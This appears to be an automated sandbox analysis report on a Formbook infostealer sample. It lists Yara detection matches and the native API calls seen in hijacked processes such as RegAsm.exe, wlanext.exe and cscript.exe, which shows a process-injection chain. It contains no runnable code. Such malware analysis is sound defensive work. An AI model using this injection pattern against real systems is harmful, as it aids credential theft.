          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418180 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418230 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004182B0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418360 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041822A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004182AA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041835E NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030599D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030598A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030596D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0305AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03059560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD NtOpenSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418180 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418230 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182B0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418360 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041822A NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004182AA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0041835E NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F398A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F399D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F396D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F395F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F39520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0375AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03759520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_037595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258360 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258230 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_032582B0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_03258180 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325835E NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_0325822A NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 6_2_032582AA NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9540 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9710 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9780 NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9840 NtDelayExecution,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D99A0 NtCreateSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A50 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029782B0 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978230 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978360 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_02978180 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029782AA NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297822A NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0297835E NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B99F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041CB27
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408C30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402D88
